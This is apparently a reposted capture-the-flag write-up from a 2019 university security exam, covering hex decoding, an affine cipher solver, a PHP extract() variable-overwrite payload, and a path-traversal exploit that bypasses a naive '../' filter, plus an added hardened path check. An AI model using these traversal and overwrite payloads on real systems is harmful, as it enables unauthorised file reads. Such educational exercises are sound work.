2019 Xidian University Cybersecurity Experimental Class Selection Exam

1.FirstBlood

Hidden modal in the page source (class="reveal-modal" style="display: none;"):

My info

Team name: Test User

Slogan: FirstBl00d

Score: 300

FLAGs found: 3

Visit url/index.php/user/updatevoice?voice=FirstBlood

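2.Hex string

Open the challenge; the hint reads:

This is a hexadecimal string; decode it and you will know where the flag is: 666c61675f69735f686572657b32653462313032346137633863353432373139633637613064666333663432302e7068707d
Simply paste the string above into a hex converter to turn it into characters.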
 
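3.Affine cipher
Ciphertext: yfsfnhtzlsrftclhwrffonw
In this affine cipher, a=15, b=23
Submit the resulting plaintext:
The affine cipher rule is: c = (m * a + b) % 26
So the plaintext is recovered with: m = ((c - b) * a^(-1)) % 26, where a^(-1) is the inverse of a modulo 26
Algorithm: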
#coding=utf-8
# Greatest common divisor (extended Euclid): returns (g, x, y) with a*x + b*y == g
def egcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = egcd(b % a, a)
        return (g, x - (b // a) * y, y)

# Modular inverse
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
        raise Exception('modular inverse does not exist')
    else:
        return x % m

# Euler's totient function
def eular(n):
    count = 0
    for k in range(0, n):
        g, x, y = egcd(k, n)
        if g == 1:
            count = count + 1
    return count

# Affine cipher (decryption)
def Affine_cipher(ciphertext, a, b):
    plantext = ''
    # Compute the inverse of a modulo 26
    fa = modinv(a, 26)
    for x in ciphertext:
        if x == ' ':
            plantext += ' '
            continue
        plantext += chr(ord('a') + ((ord(x) - b) - ord('a')) * fa % 26)
    return plantext

Call it with the key to get the plaintext.

4.Variable overwrite

<?php
$filename = 'x';
extract($_GET);
if(!empty($attempt))
{
    $conbination = trim(file_get_contents($filename));
    if ($attempt === $conbination)
    {
        echo "neirong" . "$conbination!?";
        require("flag.php");
        echo "congratulation,key is:" . "$flag";
    }
    else
    {
        echo "Incorrenr!";
    }
}
?>

 

payload:url?attempy=&filename=flag.php

 

5.web.py

def GET(self,filepath):
    if filepath.find("flag")>-1:
        return "Hacker"
    filepath = filepath.replace("../","")
    try:
        with open("./uploads/%s" % filepath,"rb") as f:
            content = f.read()
        return content
    except:
        return web.notfound("Sorry,the file you were looking for was not found.")

 

exp:

from requests import get

def get_flag():
    url = ""
    payload = url + ".../...//.../...//fla../g.txt"
    flag = get(payload).content
    return flag

if __name__ == "__main__":
    flag = get_flag()
    
    print "[x] flag :" +flag
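
Why the handler's two checks fail against the payload above, next to a hardened path check. This is an added example, not part of the original write-up or the challenge code; `page_filter`, `safe_resolve`, `demo` and the temporary directory layout are assumptions made for illustration.

```python
import os
import tempfile

# Payload string quoted from the write-up's exp above.
PAYLOAD = ".../...//.../...//fla../g.txt"

def page_filter(filepath):
    """Checks from the handler above: returns the path it would open under ./uploads, or None."""
    if filepath.find("flag") > -1:          # keyword check runs BEFORE the rewrite
        return None
    return filepath.replace("../", "")      # single pass: removals can create new "../"

def safe_resolve(base_dir, filepath):
    """Hardened check: canonicalise first, then require the result to stay under base_dir."""
    base = os.path.realpath(base_dir)
    try:
        target = os.path.realpath(os.path.join(base, filepath))
    except ValueError:                      # e.g. embedded NUL byte
        return None
    if os.path.commonpath([base, target]) != base:
        return None                         # escaped via "..", absolute path or symlink
    return target

def demo():
    """Run both checks against a constructed directory tree (layout is hypothetical)."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "srv", "app", "uploads")
    os.makedirs(uploads)
    secret = os.path.join(root, "srv", "flag.txt")
    for path, text in ((secret, "constructed-secret"),
                       (os.path.join(uploads, "notes.txt"), "public")):
        with open(path, "w") as f:
            f.write(text)
    filtered = page_filter(PAYLOAD)
    opened = os.path.realpath(os.path.join(uploads, filtered))
    return {
        "filter_output": filtered,
        "escapes_uploads": opened == os.path.realpath(secret),
        "hardened_payload": safe_resolve(uploads, filtered),
        "hardened_legit": safe_resolve(uploads, "notes.txt"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

The filter's output contains both the blocked keyword and fresh `../` sequences because each check sees the string only once; resolving the final path and comparing it with the upload directory does not depend on how the input was spelled.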

 

 

Reposted from: https://www.cnblogs.com/sylover/p/11299295.html
